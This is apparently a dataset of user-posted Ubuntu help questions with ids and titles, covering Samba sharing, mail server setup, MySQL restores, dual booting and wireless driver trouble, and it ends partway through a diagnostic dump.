451681	hp proliant ml350e gen8 - ubuntu 14.04 lts	i was researching about new ubuntu server 14.04 lts and the proliant ml350e gen8 with b120i raid controller . i found that hp certified ubuntu without raid engine on 12.04 server version , but now i can not find any documentation of award process of certification for ubuntu of this model , does anyone know anything about that ? will that model be fully certified , any one know how to make ubuntu 14.04 work with raid driver in hp proliant ml350e gen8 with b120i raid controller ?
451683	unable to access samba shares in ubuntu , in windows it works fine	yesterday i have installed ubuntu 14.04 in a dual boot with windows 7 . i have 2 samba shares which i installed on a pogoplug which i can access perfectly from my windows7 environment . when i try to access them in ubuntu , the system does not seem to accept my username and password , however they are exactly the same compared to the credentials in my windows 7 environment . any idea what could be causing this error ? edit : the logs on the server side state `` rejecting user thomas : bad password '' , however this passwords is exactly the same as i always use . could this be a bug of some kind ? edit 2 : here is my full smb.conf file , as requested . if anyone sees an obvious error or something , feel free to tell me , i 'm still a bit new to this stuff . server names are daedalus and helios . # this is the main samba configuration file . you should read the # smb.conf ( 5 ) manual page in order to understand the options listed # here . samba has a huge number of configurable options ( perhaps too # many ! ) most of which are not shown in this example # # any line which starts with a ; ( semi-colon ) or a # ( hash ) # is a comment and is ignored . in this example we will use a # # for commentry and a ; for parts of the config file that you # may wish to enable # # note : whenever you modify this file you should run the command `` testparm '' # to check that you have not made any basic syntactic errors . # # ======================= global settings ===================================== [ global ] # workgroup = nt-domain-name or workgroup-name workgroup = workgroup # server string is the equivalent of the nt description field server string = pogoplug samba2 server # this option is important for security . it allows you to restrict # connections to machines which are on your local network . the # following example restricts access to two c class networks and # the `` loopback '' interface . for more examples of the syntax see # the smb.conf man page hosts allow = 192 . 127 . # accept null passwords ? null passwords = yes # if you want to automatically load your printer list rather # than setting them up individually then you 'll need this printcap name = /etc/printcap load printers = no # it should not be necessary to spell out the print system type unless # yours is non-standard . currently supported print systems include : # bsd , sysv , plp , lprng , aix , hpux , qnx ; printing = bsd # uncomment this if you want a guest account , you must add this to /etc/passwd # otherwise the user `` nobody '' is used . if an unknown user # tries to access the server , he will get guest access privileges . guest account = nobody map to guest = bad user # this tells samba to use a separate log file for each machine # that connects log file = /opt/var/log/samba/log. % m # put a capping on the size of the log files ( in kb ) . max log size = 50 # log level log level = 1 # oplock support . to be deactivated at this moment . oplocks = no kernel oplocks = no level 2 oplocks = no # security mode . most people will want user level security . see # security_level.txt for details . security = user # use password server option only with security = server ; password server = < nt-server-name > # password level allows matching of _n_ characters of the password for # all combinations of upper and lower case . ; password level = 8 ; username level = 8 # you may wish to use password encryption . please read # encryption.txt , win95.txt and winnt.txt in the samba documentation . # do not enable this option unless you have read those documents encrypt passwords = yes smb passwd file = /opt/etc/samba/smbpasswd # the following are needed to allow password changing from windows to # update the linux sytsem password also . # note : use these with 'encrypt passwords ' and 'smb passwd file ' above . # note2 : you do not need these to allow workstations to change only # the encrypted smb passwords . they allow the unix password # to be kept in sync with the smb password . ; unix password sync = yes ; passwd program = /usr/bin/passwd % u ; passwd chat = *new*unix*password* % n\n *retype*new*unix*password* % n\n *passwd : *all*authentication*tokens*updated*successfully* # unix users can map to different smb user names ; username map = /opt/etc/samba/smbusers # using the following line enables you to customise your configuration # on a per machine basis . the % m gets replaced with the netbios name # of the machine that is connecting ; include = /etc/samba/smb.conf. % m # most people will find that this option gives better performance . # see speed.txt and the manual pages for details socket options = tcp_nodelay so_rcvbuf=8192 so_sndbuf=8192 # configure samba to use multiple interfaces # if you have multiple network interfaces then you must list them # here . see the man page for details . ; interfaces = 192.168.12.2/24 192.168.13.2/24 ; interfaces = br0 # configure remote browse list synchronisation here # request announcement to , or browse list sync from : # a specific host or from / to a whole subnet ( see below ) ; remote browse sync = 192.168.3.25 192.168.5.255 # cause this host to announce itself to local subnets here ; remote announce = 192.168.1.255 192.168.2.44 # browser control options : # set local master to no if you do n't want samba to become a master # browser on your network . otherwise the normal election rules apply ; local master = no # os level determines the precedence of this server in master browser # elections . the default value should be reasonable ; os level = 33 # domain master specifies samba to be the domain master browser . this # allows samba to collate browse lists between subnets . do n't use this # if you already have a windows nt domain controller doing this job ; domain master = yes # preferred master causes samba to force a local browser election on startup # and gives it a slightly higher chance of winning the election ; preferred master = yes # use only if you have an nt server on your network that has been # configured at install time to be a primary domain controller . ; domain controller = < nt-domain-controller-smbname > # enable this if you want samba to be a domain logon server for # windows95 workstations . ; domain logons = yes # if you enable domain logons then you may want a per-machine or # per user logon script # run a specific logon batch file per workstation ( machine ) ; logon script = % m.bat # run a specific logon batch file per username ; logon script = % u.bat # where to store roving profiles ( only for win95 and winnt ) # % l substitutes for this servers netbios name , % u is username # you must uncomment the [ profiles ] share below ; logon path = \\ % l\profiles\ % u # all netbios names must be resolved to ip addresses # 'name resolve order ' allows the named resolution mechanism to be specified # the default order is `` host lmhosts wins bcast '' . `` host '' means use the unix # system gethostbyname ( ) function call that will use either /etc/hosts or # dns or nis depending on the settings of /etc/host.config , /etc/nsswitch.conf # and the /etc/resolv.conf file . `` host '' therefore is system configuration # dependant . this parameter is most often of use to prevent dns lookups # in order to resolve netbios names to ip addresses . use with care ! # the example below excludes use of name resolution for machines that are not # on the local network segment # - or - are not deliberately to be known via lmhosts or via wins . ; name resolve order = wins lmhosts bcast # windows internet name serving support section : # wins support - tells the nmbd component of samba to enable it 's wins server ; wins support = yes # wins server - tells the nmbd components of samba to be a wins client # note : samba can be either a wins server , or a wins client , but not both ; wins server = w.x.y.z # wins proxy - tells samba to answer name resolution queries on # behalf of a non wins capable client , for this to work there must be # at least one wins server on the network . the default is no . ; wins proxy = yes # dns proxy - tells samba whether or not to try to resolve netbios names # via dns nslookups . the built-in default for versions 1.9.17 is yes , # this has been changed in version 1.9.18 to no . dns proxy = no # case preservation can be handy - system default is _no_ # note : these can be set on a per share basis preserve case = no ; short preserve case = no # default case is normally upper case for all dos files ; default case = lower # be very careful with case sensitivity - it can break things ! ; case sensitive = no # this parameter specifies the dos code page that the clients accessing # samba are using . to determine what code page a windows or dos client # is using , open a dos command prompt and type the command chcp . ; client code page = 852 # this allows smbd to map incoming filenames from a dos code page # ( see the client code page parameter ) to several built in unix character sets . ; character set = iso8859-2 # ============================ share definitions ============================== [ homes ] comment = home directories browseable = no writable = yes # un-comment the following and create the netlogon directory for domain logons ; [ netlogon ] ; comment = network logon service ; path = /opt/home/netlogon ; guest ok = yes ; writable = no ; share modes = no # un-comment the following to provide a specific roving profile share # the default is to use the user 's home directory ; [ profiles ] ; path = /opt/home/profiles ; browseable = no ; guest ok = yes # note : if you have a bsd-style print system there is no need to # specifically define each individual printer [ printers ] comment = all printers path = /opt/var/spool/samba browseable = no # set public = yes to allow user 'guest account ' to print guest ok = no writable = no printable = yes # this one is useful for people to share files [ tmp ] comment = temporary file space path = /tmp read only = no public = yes [ www ] comment = http server files path = /opt/share/www read only = no public = yes # a publicly accessible directory , but read only , except for people in # the `` staff '' group ; [ public ] ; comment = public stuff ; path = /home/samba ; public = yes ; read only = yes ; write list = @ staff # fileserver helios configuration [ helios ] comment = media server hd 1 path = /tmp/.cemnt/mnt_sda1/ available = yes public = no writable = no create mask = 0755 write list = @ samba magali force create mode = 0755 browseable = yes directory mask = 0775 force directory mode = 0775 oplocks = no kernel oplocks = no read list = nobody guest ok = yes # fileserver daedalus configuration . [ daedalus ] comment = media server hd2 path = /tmp/.cemnt/mnt_sdb5/ available = yes public = no writable = no create mask = 0755 write list = @ samba thomas force create mode = 0755 browseable = yes directory mask = 0775 force directory mode = 0775 oplocks = no kernel oplocks = no read list = nobody magali guest ok = yes # other examples . # # a private printer , usable only by fred . spool data will be placed in fred's # home directory . note that fred must have write access to the spool directory , # wherever it is . ; [ fredsprn ] ; comment = fred 's printer ; valid users = fred ; path = /homes/fred ; printer = freds_printer ; public = no ; writable = no ; printable = yes # a private directory , usable only by fred . note that fred requires write # access to the directory . ; [ fredsdir ] ; comment = fred 's service ; path = /usr/somewhere/private ; valid users = fred ; public = no ; writable = yes ; printable = no # a service which has a different directory for each machine that connects # this allows you to tailor configurations to incoming machines . you could # also use the % u option to tailor it by user name . # the % m gets replaced with the machine name that is connecting . ; [ pchome ] ; comment = pc directories ; path = /usr/pc/ % m ; public = no ; writable = yes # a publicly accessible directory , read/write to all users . note that all files # created in the directory by users will be owned by the default user , so # any user with access can delete any other user 's files . obviously this # directory must be writable by the default user . another user could of course # be specified , in which case all files would be owned by that user instead . ; [ public ] ; path = /usr/somewhere/else/public ; public = yes ; only guest = yes ; writable = yes ; printable = no # the following two entries demonstrate how to share a directory so that two # users can place files there that will be owned by the specific users . in this # setup , the directory should be writable by both users and should have the # sticky bit set on it to prevent abuse . obviously this could be extended to # as many users as required . ; [ myshare ] ; comment = mary 's and fred 's stuff ; path = /usr/somewhere/shared ; valid users = mary fred ; public = no ; writable = yes ; printable = no ; create mask = 0765
451687	import bookmarks in firefox from windows to ubuntu ?	i have windows 7 64 bit on my laptop and have just installed ubuntu 14.04 . is there a way to import my bookmarks from my windows firefox and integrate them into my ubuntu firefox web browser ? i could not find anyway to import bookmarks from windows i have no other details available .
451688	jsymphonic wo n't start on ubuntu 14.04	i wanted to synch my sony walkman with my pc but jsymphonic just wo n't start ! i tried installing and uninstalling java several times but no chance . any one can help ?
451689	hud commands from all applications ?	i 've just recently upgraded from 12.04 to 14.04 . in 12.04 , i constantly used the hud and , frequently , i fired commands from apps other than the active one . for example , i would be running any application and press alt + `` hiber ... '' to hibernate the computer . another example would be using firefox and press alt + `` stop ... '' to stop the current hamster task . i do n't get that behavior in 14.04 now , it looks like only actions from the active application appear . is that the default behavior now ? any way to change it ?
451693	file transfer with mtp device on ubuntu 12.04 via gvfs	hello i have a samsung galaxy note 10.1 ( android 4.1.2 ) and ubuntu 12.04.3 lts 32-bit installed on my laptop . i added the following ppa https : //launchpad.net/~langdalepl/+archive/gvfs-mtp and did an upgrade . after a restart when i plug in my tablet into the usb port of my computer it detected and mounted it . however , after a restart it does not mount it automatically and by the way files on the device can not be edited . is there a way to edit these files and automate the process ? by the way where does the ubuntu mount the device in the file system ? by the way do i have to unmount the device before disconnecting it ? edit : files inside the device can not be copied from one directory into another . thanks
451694	ca n't change any settings	when i open my session , the wallpaper change for the default one and i ca n't change any settings . when it happened for the first time i was running on ubuntu 13.10 , i have upgraded to 14.04 lts hoping that it would fix the problem . unfortunately it would n't . thanks .
451697	ffmpeg : installing from repository or compiling from source ?	when googling for `` install ffmpeg ubuntu '' the first link i 've got was https : //trac.ffmpeg.org/wiki/ubuntucompilationguide , so i followed it , and unfortunutely got some errors during ffmpeg compilation , on last steps . then i 've typed apt-get install ffmpeg and everything worked . my questions are below : 1 ) is there any sense compiling when we have binaries in the repo ? 1a ) ( useless complain : why on earth google gives compile method first ? ) 2 ) have i spoiled everything with my unsuccessful compilation ? i 've removed source and build directories , but now i 'm not sure if my ffmpeg works correctly . how can i check ? ? : (
451699	how to use raw cups print queue ?	i have a laser printer connected to my raspberry pi . because the pi has such a puny cpu i have set it up as a raw printer . i am able to print just fine from my wife 's mac , but i can not seem to figure out how to do it from my ubuntu laptop . i am able to locate and install the printer , configured to use its ppd , on the laptop but the print output is garbage . any ideas on what i can do to troubleshoot this further ?
451700	instalation problem	i try to install ubuntu desktop to my xp machine after booting up from the ubuntu dvd and it says its installing . i waited several hours and it says it 's still installing . the system is n't locked up because when i choose `` quit '' it asks me are you sure you want to quit . i do get the green check marks telling me i have enough disk space and an internet connection . whats going on ? system specs :
451703	can i install the broadcom sta wireless driver to kubuntu from windows ?	i need to install this driver for my wireless internet . i have windows and i was wondering if i downloaded the drive to windows could i transfer it to kubuntu and install it there ? i understand installing on linux can be troublesome at times for newer users so how would i go about that ?
451705	installation query	i have download xubuntu 14.04 and unzipped it to a folder on my desktop containing 9 folders what do i click on next to proceed with an installation ? please advise as i can not find an exe file . tia ron
451708	php not executing on apache server	i have just reinstalled apache and php5 but when i visit my doc root it just downloads a `` download '' file and when i try documentroot/index.php it just downloads the php , i have php installed but it doesnt seem to want to execute it , people said to add a 'load module ' line to my httpd conf but i dont have that file .
451709	monitor lag onubuntu 14.04 lts	allow me to explain my dilemma ! i just recently got ubuntu , and updated all the way up to the latest ubuntu 14.04 lts ! i got this all working and was super happy until i connected my aoc 1920x1080 monitor to my computer . when i connected it , ubuntu recognized the monitor and turned it on and everything , but all of a sudden it was super laggy ! whenever i would move the mouse it would be like , movement ... ... movement ... ... movement ... ... so not cool . i figured out that it only happened when i was on the desktop , so i thought maybe it had to deal something with the like the multiple workspaces that ubuntu renders ... . but that did n't work when i changed that number to 1 . just to verify for you , whenever i go to desktop it lags like crazy , but the moment i full-screen an application ( eg . firefox ) the lag goes away . i disconnected my smaller monitor and just had my buggy aoc connected , but the issue persists . i do n't want to anything else until i get this fixed so a speedy reply would be appreciated . if any other info is needed i will do my best to supply it ! thanks in advance , matthew
451710	dual boot ubuntu 14.04 and windows 8 not working	so i installed ubuntu 14.04 on a windows 8 pre-installed hp laptop . the problem is when i boot the computer it takes me straight to windows and no grub is shown . i tried following this : http : //askubuntu.com/a/358524/59618 and used boot-repair which threw this error http : //paste.ubuntu.com/7295325/ i am completely lost with this eufi stuff , can someone help me with an easy solution to have grub working on this laptop where i can choose ubuntu or windows 8 ? ps : i cant seem to get this working on my hp . i disabled fast startup and secure boot and ran bcdedit /set { bootmgr } path \efi\ubuntu\grubx64.efi and still no grub : ( the solution that this question was marked as duplicate is not working for me
451711	quad monitor setup only able to show 3 monitors	i have installed 14.04 lts on my system today i have 4 asus monitors and all 4 are recognised by the display settings object in system settings . however i can only ever get one of the two monitors connected to the second graphics card to display . though i can geteither of them to do so by `` fiddling '' with the wires . happy to provide details but i 'd need to know what would be useful .
451712	postfix/ssl/dovecote - ca n't send email	i know this looks similar to other questions on this forum , but they do n't seem to be the same core problem as the one i 'm experiencing . i 'm running ubunto 14.04 lts , and i have postfix , dovecote installed on the machine . i 'm using dovecote to supply the sasl service to postfix for sending email . if i connect to my server by hand , openssl s_client -connect my.server.com:465 -starttls smtp i can authenticate properly , using plain authentication elho localhost auth plain base64== if i try to send email from thunderbird ( running on my mac ) , the client hangs . if i add tracing to postfix for my domain , the traces do n't make sense . it looks like thunderbird is sending garbage instead of valid smtp commands , and then not processing the error codes that are coming back from postfix . the trace below has been sanitized , but only to the extent that ips and other identifying marks have been anonymized . in particular , the lines that start with `` < `` , which are the smtp commands coming from the server , have not been modified . name_mask : plaintext xsasl_dovecot_server_connect : auth reply : spid ? 1916 xsasl_dovecot_server_connect : auth reply : cuid ? 2 xsasl_dovecot_server_connect : auth reply : cookie ? 251582cd3a4c5c6bf55cb3dcd7b4ca93 xsasl_dovecot_server_connect : auth reply : done xsasl_dovecot_server_mech_filter : keep mechanism : plain xsasl_dovecot_server_mech_filter : keep mechanism : login watchdog_pat : 0x7fee42fb0640 < < my-ip > .myisp.com [ < my.ip > ] : ? ? ? match_string : ? ? ? ~ ? connect match_string : ? ? ? ~ ? get match_string : ? ? ? ~ ? post match_list_match : ? ? ? : no match > < my-ip > .myisp.com [ < my.ip > ] : 502 5.5.2 error : command not recognized watchdog_pat : 0x7fee42fb0640 < < my-ip > .myisp.com [ < my.ip > ] : ? ? ? ? ? ? ? ? ? ? ? ? ? ? match_string : ? ~ ? connect match_string : ? ~ ? get match_string : ? ~ ? post match_list_match : ? : no match > < my-ip > .myisp.com [ < my.ip > ] : 502 5.5.2 error : command not recognized watchdog_pat : 0x7fee42fb0640 < < my-ip > .myisp.com [ < my.ip > ] : > < my-ip > .myisp.com [ < my.ip > ] : 500 5.5.2 error : bad syntax watchdog_pat : 0x7fee42fb0640 < host > dovecot : imap-login : login : user= < user > , method=plain , rip= < my.ip > , lip= < server.ip > , mpid=1922 , tls , session= < aebdooh3kaci+7mg > < host > dovecot : imap-login : login : user= < user > , method=plain , rip= < my.ip > , lip= < server.ip > , mpid=1924 , tls , session= < d/hnooh3kqci+7mg > smtp_get : eof match_hostname : < my-ip > .myisp.com ~ ? 127.0.0.0/8 match_hostaddr : < my.ip > ~ ? 127.0.0.0/8 match_hostname : < my-ip > .myisp.com ~ ? [ : :ffff:127.0.0.0 ] /104 match_hostaddr : < my.ip > ~ ? [ : :ffff:127.0.0.0 ] /104 match_hostname : < my-ip > .myisp.com ~ ? [ : :1 ] /128 match_hostaddr : < my.ip > ~ ? [ : :1 ] /128 match_list_match : < my-ip > .myisp.com : no match match_list_match : < my.ip > : no match send attr request = disconnect send attr ident = smtps : < my.ip > private/anvil : wanted attribute : status input attribute name : status input attribute value : 0 private/anvil : wanted attribute : ( list terminator ) input attribute name : ( end ) lost connection after unknown from < my-ip > .myisp.com [ < my.ip > ] disconnect from < my-ip > .myisp.com [ < my.ip > ] since it works by hand , it feels to me like i have the postfix/dovecote/ssl issues sorted , but maybe i 'm missing something . thanks for any helps .
451713	errors running mpd on ubuntu 13.10	i installed mpd as a user service following the instructions here : http : //gmpc.wikia.com/wiki/mpd_install_user_service_ubuntu . when i try to run mpd , i get the following errors : can not create thread 1 operation not permitted these are the contents of my mpd configuration file $ grep -v `` ^ # \|^ $ '' .mpdconf music_directory `` /home/ubuntu/music '' playlist_directory `` /home/ubuntu/.mpd/playlists '' db_file `` /home/ubuntu/.mpd/tag_cache '' log_file `` /home/ubuntu/.mpd/mpd.log '' pid_file `` /home/ubuntu/.mpd/mpd.pid '' state_file `` /home/ubuntu/.mpd/mpdstate '' sticker_file `` /var/lib/mpd/sticker.sql '' bind_to_address `` 127.0.0.1 '' auto_update `` yes '' input { plugin `` curl '' } audio_output { type `` alsa '' name `` my alsa device '' } audio_output { type `` httpd '' name `` my http stream '' encoder `` vorbis '' # optional , vorbis or lame port `` 8000 '' bind_to_address `` 0.0.0.0 '' # optional , ipv4 or ipv6 bitrate `` 128 '' # do not define if quality is defined format `` 44100:16:1 '' max_clients `` 0 '' # optional 0=no limit }
451716	i need a netspeed indicator for ubuntu 14.04	i have a 3g mobile broadband connection that keeps changing network speed according to location and time and so i relied heavily on this applet http : //www.webupd8.org/2011/05/how-to-display-network-upload-download.html to monitor my netspeed and to choose a good location and time to download big files . now this applet does n't seem to run on ubuntu 14.04 anymore . i love this release and i do n't want to relapse into previous releases for this . so i need an alternative to this one that displays netspeed in digits unlike indicator multiload ! any help would be appreciated . i found this applet here https : //github.com/mgedmin/indicator-netspeed and i added it to startup applications like this : cd indicator-netspeed & & make & & ./indicator-netspeed but it does not start and so i created a file with this content : # ! /bin/bash cd indicator-netspeed & & make & & ./indicator-netspeed and added it to startup applications . now it runs perfectly but it shows only download speed !
451721	restoring mysql files to new disk 14.04 - permissions ?	i am rebuilding my computer with a new disk and have a backup of my mysql db 's - i have moved them to /var/lib/mysql and when i try : sudo /etc/init.d/mysql start mysql refuses to start - the error log shows this error below . i am assuming my perms on /var/lib/mysql are wrong but am unsure how to proceed . 140421 12:03:59 innodb : mutexes and rw_locks use gcc atomic builtins 140421 12:03:59 innodb : compressed tables use zlib 1.2.8 140421 12:03:59 innodb : using linux native aio 140421 12:03:59 innodb : initializing buffer pool , size = 128.0m 140421 12:03:59 innodb : completed initialization of buffer pool 140421 12:03:59 innodb : operating system error number 13 in a file operation . innodb : the error means mysqld does not have the access rights to innodb : the directory . innodb : file name ./ibdata1 innodb : file operation call : 'open ' . innodb : can not continue operation . many thanks ...
451722	allocating unallocated partition to /home	so as you can see the unallocated space is right next to my /home partition , my question is , can i just merge them by resizing sd3 ( /home partition ) with gparted right away ? or do i have to use a live cd ? i got a warning message saying that something might go wrong .
451724	wireless connection slow/inconsistent after fresh install ubuntu 14.04 ( realtek rtl8188ee )	i have been running ubuntu 14.04 using the dev builds for a over a month with no issue . then i upgraded on the official release date and issue started . i got frustrated and did a fresh install and still have same issue . i can connect to my wireless network just fine , but my connect strength and speed is very sporadic . it seems to oscillate from very slow to normal really quickly like a wave . the ping results below with my router might illustrate this . pinging router , normal to low load : ping 10.0.0.1 ( 10.0.0.1 ) 56 ( 84 ) bytes of data . 64 bytes from 10.0.0.1 : icmp_seq=5 ttl=64 time=1.73 ms 64 bytes from 10.0.0.1 : icmp_seq=6 ttl=64 time=1.69 ms 64 bytes from 10.0.0.1 : icmp_seq=7 ttl=64 time=5.71 ms 64 bytes from 10.0.0.1 : icmp_seq=8 ttl=64 time=2.10 ms 64 bytes from 10.0.0.1 : icmp_seq=9 ttl=64 time=14.9 ms 64 bytes from 10.0.0.1 : icmp_seq=10 ttl=64 time=1.41 ms 64 bytes from 10.0.0.1 : icmp_seq=11 ttl=64 time=1.48 ms 64 bytes from 10.0.0.1 : icmp_seq=12 ttl=64 time=1.38 ms 64 bytes from 10.0.0.1 : icmp_seq=13 ttl=64 time=15.1 ms 64 bytes from 10.0.0.1 : icmp_seq=14 ttl=64 time=3.32 ms 64 bytes from 10.0.0.1 : icmp_seq=15 ttl=64 time=1.86 ms 64 bytes from 10.0.0.1 : icmp_seq=17 ttl=64 time=521 ms 64 bytes from 10.0.0.1 : icmp_seq=18 ttl=64 time=1.41 ms 64 bytes from 10.0.0.1 : icmp_seq=19 ttl=64 time=1.37 ms 64 bytes from 10.0.0.1 : icmp_seq=20 ttl=64 time=1.81 ms 64 bytes from 10.0.0.1 : icmp_seq=21 ttl=64 time=1.37 ms 64 bytes from 10.0.0.1 : icmp_seq=22 ttl=64 time=5.79 ms 64 bytes from 10.0.0.1 : icmp_seq=23 ttl=64 time=28.1 ms 64 bytes from 10.0.0.1 : icmp_seq=24 ttl=64 time=4307 ms 64 bytes from 10.0.0.1 : icmp_seq=25 ttl=64 time=3307 ms 64 bytes from 10.0.0.1 : icmp_seq=29 ttl=64 time=104 ms 64 bytes from 10.0.0.1 : icmp_seq=30 ttl=64 time=1012 ms 64 bytes from 10.0.0.1 : icmp_seq=31 ttl=64 time=4.00 ms 64 bytes from 10.0.0.1 : icmp_seq=32 ttl=64 time=1.40 ms 64 bytes from 10.0.0.1 : icmp_seq=33 ttl=64 time=1.38 ms 64 bytes from 10.0.0.1 : icmp_seq=34 ttl=64 time=1008 ms 64 bytes from 10.0.0.1 : icmp_seq=35 ttl=64 time=625 ms 64 bytes from 10.0.0.1 : icmp_seq=36 ttl=64 time=5.73 ms 64 bytes from 10.0.0.1 : icmp_seq=37 ttl=64 time=22.1 ms 64 bytes from 10.0.0.1 : icmp_seq=38 ttl=64 time=1110 ms 64 bytes from 10.0.0.1 : icmp_seq=39 ttl=64 time=519 ms 64 bytes from 10.0.0.1 : icmp_seq=40 ttl=64 time=4.82 ms 64 bytes from 10.0.0.1 : icmp_seq=41 ttl=64 time=3.03 ms 64 bytes from 10.0.0.1 : icmp_seq=42 ttl=64 time=1009 ms 64 bytes from 10.0.0.1 : icmp_seq=44 ttl=64 time=105 ms 64 bytes from 10.0.0.1 : icmp_seq=45 ttl=64 time=3.03 ms 64 bytes from 10.0.0.1 : icmp_seq=46 ttl=64 time=1008 ms 64 bytes from 10.0.0.1 : icmp_seq=47 ttl=64 time=1.67 ms 64 bytes from 10.0.0.1 : icmp_seq=48 ttl=64 time=1001 ms 64 bytes from 10.0.0.1 : icmp_seq=49 ttl=64 time=509 ms 64 bytes from 10.0.0.1 : icmp_seq=50 ttl=64 time=1.97 ms 64 bytes from 10.0.0.1 : icmp_seq=51 ttl=64 time=1.39 ms 64 bytes from 10.0.0.1 : icmp_seq=52 ttl=64 time=502 ms ^c -- - 10.0.0.1 ping statistics -- - 52 packets transmitted , 43 received , 17 % packet loss , time 51102ms rtt min/avg/max/mdev = 1.371/390.573/4307.355/845.151 ms , pipe 5 wireless info : # # # # # # # # # # wireless info start # # # # # # # # # # # # # # # release # # # # # distributor id : ubuntu description : ubuntu 14.04 lts release : 14.04 codename : trusty # # # # # kernel # # # # # linux kyle-pc 3.13.0-24-generic # 46-ubuntu smp thu apr 10 19:11:08 utc 2014 x86_64 x86_64 x86_64 gnu/linux # # # # # lspci # # # # # 02:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8188ee wireless network adapter [ 10ec:8179 ] ( rev 01 ) subsystem : realtek semiconductor co. , ltd. device [ 10ec:0181 ] kernel driver in use : rtl8188ee 03:00.0 ethernet controller [ 0200 ] : qualcomm atheros qca8171 gigabit ethernet [ 1969:10a1 ] ( rev 10 ) subsystem : toshiba america info systems device [ 1179 : fa40 ] kernel driver in use : alx # # # # # lsusb # # # # # bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 005 : id 13d3:5606 imc networks bus 001 device 008 : id 058f:6366 alcor micro corp. multi flash reader bus 001 device 007 : id 046d : c517 logitech , inc. lx710 cordless desktop laser bus 001 device 006 : id 058f:6254 alcor micro corp. usb hub bus 001 device 004 : id 2001 : f103 d-link corp. dub-h7 7-port usb 2.0 hub bus 001 device 003 : id 058f:6366 alcor micro corp. multi flash reader bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 002 : id 1058:07a8 western digital technologies , inc . bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub # # # # # pcmcia card info # # # # # # # # # # rfkill # # # # # 0 : phy0 : wireless lan soft blocked : no hard blocked : no # # # # # iw reg get # # # # # country us : ( 2402 - 2472 @ 40 ) , ( 3 , 27 ) ( 5170 - 5250 @ 40 ) , ( 3 , 17 ) ( 5250 - 5330 @ 40 ) , ( 3 , 20 ) , dfs ( 5490 - 5600 @ 40 ) , ( 3 , 20 ) , dfs ( 5650 - 5710 @ 40 ) , ( 3 , 20 ) , dfs ( 5735 - 5835 @ 40 ) , ( 3 , 30 ) ( 57240 - 63720 @ 2160 ) , ( n/a , 40 ) # # # # # interfaces # # # # # # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback # # # # # iwconfig # # # # # wlan0 ieee 802.11bgn essid : '' home-3b12 '' mode : managed frequency:2.462 ghz access point : < mac address removed > bit rate=65 mb/s tx-power=20 dbm retry long limit:7 rts thr=2347 b fragment thr : off power management : off link quality=59/70 signal level=-51 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 # # # # # route # # # # # kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 10.0.0.1 0.0.0.0 ug 0 0 0 wlan0 10.0.0.0 0.0.0.0 255.255.255.0 u 9 0 0 wlan0 # # # # # resolv.conf # # # # # nameserver 127.0.1.1 search hsd1.wa.comcast.net # # # # # nm-tool # # # # # networkmanager tool state : connected ( global ) - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : alx state : disconnected default : no hw address : < mac address removed > capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : on - device : wlan0 [ home-3b12 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : 802.11 wifi driver : rtl8188ee state : connected default : yes hw address : < mac address removed > capabilities : speed : 65 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) heather : infra , < mac address removed > , freq 2422 mhz , rate 54 mb/s , strength 34 wpa2 13401 : infra , < mac address removed > , freq 2437 mhz , rate 54 mb/s , strength 27 wpa2 nariya : infra , < mac address removed > , freq 2412 mhz , rate 54 mb/s , strength 100 wpa wpa2 2wire826 : infra , < mac address removed > , freq 2462 mhz , rate 54 mb/s , strength 74 wep belkin.f9c : infra , < mac address removed > , freq 2437 mhz , rate 54 mb/s , strength 27 wpa2 heather_vap : infra , < mac address removed > , freq 2422 mhz , rate 54 mb/s , strength 54 wpa2 belkin.f9c.guests : infra , < mac address removed > , freq 2437 mhz , rate 54 mb/s , strength 27 test : infra , < mac address removed > , freq 2462 mhz , rate 54 mb/s , strength 46 wpa2 *home-3b12 : infra , < mac address removed > , freq 2462 mhz , rate 54 mb/s , strength 66 wpa wpa2 ipv4 settings : address : 10.0.0.3 prefix : 24 ( 255.255.255.0 ) gateway : 10.0.0.1 dns : 75.75.75.75 dns : 75.75.76.76 # # # # # networkmanager.state # # # # # [ main ] networkingenabled=true wirelessenabled=true wwanenabled=true wimaxenabled=true # # # # # networkmanager.conf # # # # # [ main ] plugins=ifupdown , keyfile , ofono dns=dnsmasq [ ifupdown ] managed=false # # # # # iwlist # # # # # # # # # # iwlist channel # # # # # wlan0 11 channels in total ; available frequencies : channel 01 : 2.412 ghz channel 02 : 2.417 ghz channel 03 : 2.422 ghz channel 04 : 2.427 ghz channel 05 : 2.432 ghz channel 06 : 2.437 ghz channel 07 : 2.442 ghz channel 08 : 2.447 ghz channel 09 : 2.452 ghz channel 10 : 2.457 ghz channel 11 : 2.462 ghz current frequency:2.462 ghz ( channel 11 ) # # # # # lsmod # # # # # rtl8188ee 89601 0 rtl_pci 26690 1 rtl8188ee rtlwifi 63475 2 rtl_pci , rtl8188ee mac80211 626489 3 rtl_pci , rtlwifi , rtl8188ee cfg80211 484040 2 mac80211 , rtlwifi # # # # # modinfo # # # # # filename : /lib/modules/3.13.0-24-generic/kernel/drivers/net/wireless/rtlwifi/rtl8188ee/rtl8188ee.ko firmware : rtlwifi/rtl8188efw.bin description : realtek 8188e 802.11n pci wireless license : gpl author : larry finger < larry.finger @ lwfinger.net > author : realtek wlanfae < wlanfae @ realtek.com > author : zhiyuan_yang < zhiyuan_yang @ realsil.com.cn > srcversion : 1b8e36556b30aa35325f55d alias : pci : v000010ecd00008179sv*sd*bc*sc*i* depends : rtlwifi , rtl_pci , mac80211 intree : y vermagic : 3.13.0-24-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : < mac address removed > :47:4b : 